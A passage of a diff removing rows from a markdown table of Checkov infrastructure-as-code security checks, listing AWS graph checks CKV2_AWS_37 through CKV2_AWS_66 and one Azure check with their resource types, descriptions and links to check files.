-| 1421 | CKV2_AWS_37              | resource                         | aws_waf_byte_match_set                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1422 | CKV2_AWS_37              | resource                         | aws_waf_geo_match_set                                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1423 | CKV2_AWS_37              | resource                         | aws_waf_ipset                                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1424 | CKV2_AWS_37              | resource                         | aws_waf_rate_based_rule                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1425 | CKV2_AWS_37              | resource                         | aws_waf_regex_match_set                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1426 | CKV2_AWS_37              | resource                         | aws_waf_regex_pattern_set                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1427 | CKV2_AWS_37              | resource                         | aws_waf_rule                                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1428 | CKV2_AWS_37              | resource                         | aws_waf_rule_group                                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1429 | CKV2_AWS_37              | resource                         | aws_waf_size_constraint_set                                                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1430 | CKV2_AWS_37              | resource                         | aws_waf_sql_injection_match_set                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1431 | CKV2_AWS_37              | resource                         | aws_waf_web_acl                                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1432 | CKV2_AWS_37              | resource                         | aws_waf_xss_match_set                                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1433 | CKV2_AWS_37              | resource                         | aws_wafregional_byte_match_set                                                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1434 | CKV2_AWS_37              | resource                         | aws_wafregional_geo_match_set                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1435 | CKV2_AWS_37              | resource                         | aws_wafregional_ipset                                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1436 | CKV2_AWS_37              | resource                         | aws_wafregional_rate_based_rule                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1437 | CKV2_AWS_37              | resource                         | aws_wafregional_regex_match_set                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1438 | CKV2_AWS_37              | resource                         | aws_wafregional_regex_pattern_set                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1439 | CKV2_AWS_37              | resource                         | aws_wafregional_rule                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1440 | CKV2_AWS_37              | resource                         | aws_wafregional_rule_group                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1441 | CKV2_AWS_37              | resource                         | aws_wafregional_size_constraint_set                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1442 | CKV2_AWS_37              | resource                         | aws_wafregional_sql_injection_match_set                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1443 | CKV2_AWS_37              | resource                         | aws_wafregional_web_acl                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1444 | CKV2_AWS_37              | resource                         | aws_wafregional_web_acl_association                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1445 | CKV2_AWS_37              | resource                         | aws_wafregional_xss_match_set                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1446 | CKV2_AWS_37              | resource                         | aws_wafv2_ip_set                                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1447 | CKV2_AWS_37              | resource                         | aws_wafv2_regex_pattern_set                                                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1448 | CKV2_AWS_37              | resource                         | aws_wafv2_rule_group                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1449 | CKV2_AWS_37              | resource                         | aws_wafv2_web_acl                                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1450 | CKV2_AWS_37              | resource                         | aws_wafv2_web_acl_association                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1451 | CKV2_AWS_37              | resource                         | aws_wafv2_web_acl_logging_configuration                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1452 | CKV2_AWS_37              | resource                         | aws_worklink_fleet                                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1453 | CKV2_AWS_37              | resource                         | aws_worklink_website_certificate_authority_association                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1454 | CKV2_AWS_37              | resource                         | aws_workspaces_directory                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1455 | CKV2_AWS_37              | resource                         | aws_workspaces_ip_group                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1456 | CKV2_AWS_37              | resource                         | aws_workspaces_workspace                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1457 | CKV2_AWS_37              | resource                         | aws_xray_sampling_rule                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1458 | CKV2_AWS_38              | resource                         | aws_route53_zone                                                                                 | Ensure Domain Name System Security Extensions (DNSSEC) signing is enabled for Amazon Route 53 public hosted zones                                                                                        | Terraform               | [Route53ZoneEnableDNSSECSigning.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/Route53ZoneEnableDNSSECSigning.yaml)                                                   |
-| 1459 | CKV2_AWS_39              | resource                         | aws_route53_zone                                                                                 | Ensure Domain Name System (DNS) query logging is enabled for Amazon Route 53 hosted zones                                                                                                                | Terraform               | [Route53ZoneHasMatchingQueryLog.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/Route53ZoneHasMatchingQueryLog.yaml)                                                   |
-| 1460 | CKV2_AWS_40              | resource                         | aws_iam_group_policy                                                                             | Ensure AWS IAM policy does not allow full IAM privileges                                                                                                                                                 | Terraform               | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml)                                                   |
-| 1461 | CKV2_AWS_40              | resource                         | aws_iam_policy                                                                                   | Ensure AWS IAM policy does not allow full IAM privileges                                                                                                                                                 | Terraform               | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml)                                                   |
-| 1462 | CKV2_AWS_40              | resource                         | aws_iam_role_policy                                                                              | Ensure AWS IAM policy does not allow full IAM privileges                                                                                                                                                 | Terraform               | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml)                                                   |
-| 1463 | CKV2_AWS_40              | resource                         | aws_iam_user_policy                                                                              | Ensure AWS IAM policy does not allow full IAM privileges                                                                                                                                                 | Terraform               | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml)                                                   |
-| 1464 | CKV2_AWS_40              | resource                         | aws_ssoadmin_permission_set_inline_policy                                                        | Ensure AWS IAM policy does not allow full IAM privileges                                                                                                                                                 | Terraform               | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml)                                                   |
-| 1465 | CKV2_AWS_40              | resource                         | data.aws_iam_policy_document                                                                     | Ensure AWS IAM policy does not allow full IAM privileges                                                                                                                                                 | Terraform               | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml)                                                   |
-| 1466 | CKV2_AWS_41              | resource                         | aws_instance                                                                                     | Ensure an IAM role is attached to EC2 instance                                                                                                                                                           | Terraform               | [EC2InstanceHasIAMRoleAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EC2InstanceHasIAMRoleAttached.yaml)                                                     |
-| 1467 | CKV2_AWS_42              | resource                         | aws_cloudfront_distribution                                                                      | Ensure AWS CloudFront distribution uses custom SSL certificate                                                                                                                                           | Terraform               | [CloudFrontHasCustomSSLCertificate.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontHasCustomSSLCertificate.yaml)                                             |
-| 1468 | CKV2_AWS_43              | resource                         | aws_s3_bucket_acl                                                                                | Ensure S3 Bucket does not allow access to all Authenticated users                                                                                                                                        | Terraform               | [S3NotAllowAccessToAllAuthenticatedUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3NotAllowAccessToAllAuthenticatedUsers.yaml)                                 |
-| 1469 | CKV2_AWS_44              | resource                         | aws_route                                                                                        | Ensure AWS route table with VPC peering does not contain routes overly permissive to all traffic                                                                                                         | Terraform               | [VPCPeeringRouteTableOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCPeeringRouteTableOverlyPermissive.yaml)                                       |
-| 1470 | CKV2_AWS_44              | resource                         | aws_route_table                                                                                  | Ensure AWS route table with VPC peering does not contain routes overly permissive to all traffic                                                                                                         | Terraform               | [VPCPeeringRouteTableOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCPeeringRouteTableOverlyPermissive.yaml)                                       |
-| 1471 | CKV2_AWS_45              | resource                         | aws_config_configuration_recorder                                                                | Ensure AWS Config recorder is enabled to record all supported resources                                                                                                                                  | Terraform               | [AWSConfigRecorderEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSConfigRecorderEnabled.yaml)                                                               |
-| 1472 | CKV2_AWS_45              | resource                         | aws_config_configuration_recorder_status                                                         | Ensure AWS Config recorder is enabled to record all supported resources                                                                                                                                  | Terraform               | [AWSConfigRecorderEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSConfigRecorderEnabled.yaml)                                                               |
-| 1473 | CKV2_AWS_46              | resource                         | aws_cloudfront_distribution                                                                      | Ensure AWS CloudFront Distribution with S3 have Origin Access set to enabled                                                                                                                             | Terraform               | [CLoudFrontS3OriginConfigWithOAI.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CLoudFrontS3OriginConfigWithOAI.yaml)                                                 |
-| 1474 | CKV2_AWS_47              | resource                         | aws_cloudfront_distribution                                                                      | Ensure AWS CloudFront attached WAFv2 WebACL is configured with AMR for Log4j Vulnerability                                                                                                               | Terraform               | [CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml)               |
-| 1475 | CKV2_AWS_47              | resource                         | aws_wafv2_web_acl                                                                                | Ensure AWS CloudFront attached WAFv2 WebACL is configured with AMR for Log4j Vulnerability                                                                                                               | Terraform               | [CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml)               |
-| 1476 | CKV2_AWS_48              | resource                         | aws_config_configuration_recorder                                                                | Ensure AWS Config must record all possible resources                                                                                                                                                     | Terraform               | [ConfigRecorderRecordsAllGlobalResources.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ConfigRecorderRecordsAllGlobalResources.yaml)                                 |
-| 1477 | CKV2_AWS_49              | resource                         | aws_dms_endpoint                                                                                 | Ensure AWS Database Migration Service endpoints have SSL configured                                                                                                                                      | Terraform               | [DMSEndpointHaveSSLConfigured.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/DMSEndpointHaveSSLConfigured.yaml)                                                       |
-| 1478 | CKV2_AWS_50              | resource                         | aws_elasticache_replication_group                                                                | Ensure AWS ElastiCache Redis cluster with Multi-AZ Automatic Failover feature set to enabled                                                                                                             | Terraform               | [ElastiCacheRedisConfiguredAutomaticFailOver.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ElastiCacheRedisConfiguredAutomaticFailOver.yaml)                         |
-| 1479 | CKV2_AWS_51              | resource                         | aws_api_gateway_stage                                                                            | Ensure AWS API Gateway endpoints uses client certificate authentication                                                                                                                                  | Terraform               | [APIGatewayEndpointsUsesCertificateForAuthentication.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayEndpointsUsesCertificateForAuthentication.yaml)         |
-| 1480 | CKV2_AWS_51              | resource                         | aws_apigatewayv2_api                                                                             | Ensure AWS API Gateway endpoints uses client certificate authentication                                                                                                                                  | Terraform               | [APIGatewayEndpointsUsesCertificateForAuthentication.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayEndpointsUsesCertificateForAuthentication.yaml)         |
-| 1481 | CKV2_AWS_51              | resource                         | aws_apigatewayv2_stage                                                                           | Ensure AWS API Gateway endpoints uses client certificate authentication                                                                                                                                  | Terraform               | [APIGatewayEndpointsUsesCertificateForAuthentication.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayEndpointsUsesCertificateForAuthentication.yaml)         |
-| 1482 | CKV2_AWS_52              | resource                         | aws_elasticsearch_domain                                                                         | Ensure AWS ElasticSearch/OpenSearch Fine-grained access control is enabled                                                                                                                               | Terraform               | [OpenSearchDomainHasFineGrainedControl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/OpenSearchDomainHasFineGrainedControl.yaml)                                     |
-| 1483 | CKV2_AWS_52              | resource                         | aws_opensearch_domain                                                                            | Ensure AWS ElasticSearch/OpenSearch Fine-grained access control is enabled                                                                                                                               | Terraform               | [OpenSearchDomainHasFineGrainedControl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/OpenSearchDomainHasFineGrainedControl.yaml)                                     |
-| 1484 | CKV2_AWS_53              | resource                         | aws_api_gateway_method                                                                           | Ensure AWS API gateway request is validated                                                                                                                                                              | Terraform               | [APIGatewayRequestParameterValidationEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayRequestParameterValidationEnabled.yaml)                         |
-| 1485 | CKV2_AWS_54              | resource                         | aws_cloudfront_distribution                                                                      | Ensure AWS CloudFront distribution is using secure SSL protocols for HTTPS communication                                                                                                                 | Terraform               | [CloudFrontUsesSecureProtocolsForHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontUsesSecureProtocolsForHTTPS.yaml)                                     |
-| 1486 | CKV2_AWS_55              | resource                         | aws_emr_cluster                                                                                  | Ensure AWS EMR cluster is configured with security configuration                                                                                                                                         | Terraform               | [EMRClusterHasSecurityConfiguration.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EMRClusterHasSecurityConfiguration.yaml)                                           |
-| 1487 | CKV2_AWS_56              | resource                         | aws_iam_group_policy_attachment                                                                  | Ensure AWS Managed IAMFullAccess IAM policy is not used.                                                                                                                                                 | Terraform               | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml)                                                     |
-| 1488 | CKV2_AWS_56              | resource                         | aws_iam_policy_attachment                                                                        | Ensure AWS Managed IAMFullAccess IAM policy is not used.                                                                                                                                                 | Terraform               | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml)                                                     |
-| 1489 | CKV2_AWS_56              | resource                         | aws_iam_role                                                                                     | Ensure AWS Managed IAMFullAccess IAM policy is not used.                                                                                                                                                 | Terraform               | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml)                                                     |
-| 1490 | CKV2_AWS_56              | resource                         | aws_iam_role_policy_attachment                                                                   | Ensure AWS Managed IAMFullAccess IAM policy is not used.                                                                                                                                                 | Terraform               | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml)                                                     |
-| 1491 | CKV2_AWS_56              | resource                         | aws_iam_user_policy_attachment                                                                   | Ensure AWS Managed IAMFullAccess IAM policy is not used.                                                                                                                                                 | Terraform               | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml)                                                     |
-| 1492 | CKV2_AWS_56              | resource                         | aws_ssoadmin_managed_policy_attachment                                                           | Ensure AWS Managed IAMFullAccess IAM policy is not used.                                                                                                                                                 | Terraform               | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml)                                                     |
-| 1493 | CKV2_AWS_56              | resource                         | data.aws_iam_policy                                                                              | Ensure AWS Managed IAMFullAccess IAM policy is not used.                                                                                                                                                 | Terraform               | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml)                                                     |
-| 1494 | CKV2_AWS_57              | resource                         | aws_secretsmanager_secret                                                                        | Ensure Secrets Manager secrets should have automatic rotation enabled                                                                                                                                    | Terraform               | [SecretsAreRotated.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SecretsAreRotated.yaml)                                                                             |
-| 1495 | CKV2_AWS_58              | resource                         | aws_neptune_cluster                                                                              | Ensure AWS Neptune cluster deletion protection is enabled                                                                                                                                                | Terraform               | [NeptuneDeletionProtectionEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/NeptuneDeletionProtectionEnabled.yaml)                                               |
-| 1496 | CKV2_AWS_59              | resource                         | aws_elasticsearch_domain                                                                         | Ensure ElasticSearch/OpenSearch has dedicated master node enabled                                                                                                                                        | Terraform               | [ElasticSearchDedicatedMasterEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ElasticSearchDedicatedMasterEnabled.yaml)                                         |
-| 1497 | CKV2_AWS_59              | resource                         | aws_opensearch_domain                                                                            | Ensure ElasticSearch/OpenSearch has dedicated master node enabled                                                                                                                                        | Terraform               | [ElasticSearchDedicatedMasterEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ElasticSearchDedicatedMasterEnabled.yaml)                                         |
-| 1498 | CKV2_AWS_60              | resource                         | aws_db_instance                                                                                  | Ensure RDS instance with copy tags to snapshots is enabled                                                                                                                                               | Terraform               | [RDSEnableCopyTagsToSnapshot.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/RDSEnableCopyTagsToSnapshot.yaml)                                                         |
-| 1499 | CKV2_AWS_61              | resource                         | aws_s3_bucket                                                                                    | Ensure that an S3 bucket has a lifecycle configuration                                                                                                                                                   | Terraform               | [S3BucketLifecycle.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketLifecycle.yaml)                                                                             |
-| 1500 | CKV2_AWS_62              | resource                         | aws_s3_bucket                                                                                    | Ensure S3 buckets should have event notifications enabled                                                                                                                                                | Terraform               | [S3BucketEventNotifications.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketEventNotifications.yaml)                                                           |
-| 1501 | CKV2_AWS_63              | resource                         | aws_networkfirewall_firewall                                                                     | Ensure Network firewall has logging configuration defined                                                                                                                                                | Terraform               | [NetworkFirewallHasLogging.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/NetworkFirewallHasLogging.yaml)                                                             |
-| 1502 | CKV2_AWS_64              | resource                         | aws_kms_key                                                                                      | Ensure KMS key Policy is defined                                                                                                                                                                         | Terraform               | [KmsKeyPolicyIsDefined.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/KmsKeyPolicyIsDefined.yaml)                                                                     |
-| 1503 | CKV2_AWS_65              | resource                         | aws_s3_bucket_ownership_controls                                                                 | Ensure access control lists for S3 buckets are disabled                                                                                                                                                  | Terraform               | [AWSdisableS3ACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSdisableS3ACL.yaml)                                                                                 |
-| 1504 | CKV2_AWS_66              | resource                         | aws_mwaa_environment                                                                             | Ensure MWAA environment is not publicly accessible                                                                                                                                                       | Terraform               | [AWS_private_MWAA_environment.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWS_private_MWAA_environment.yaml)                                                       |
-| 1505 | CKV_AZURE_1              | resource                         | Microsoft.Compute/virtualMachines                                                                | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead)                                                                                                                             | arm                     | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstancePassword.py)                                                                                       |
-| 1506 | CKV_AZURE_1              | resource                         | Microsoft.Compute/virtualMachines                                                                | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead)                                                                                                                             | Bicep                   | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstancePassword.py)                                                                                       |
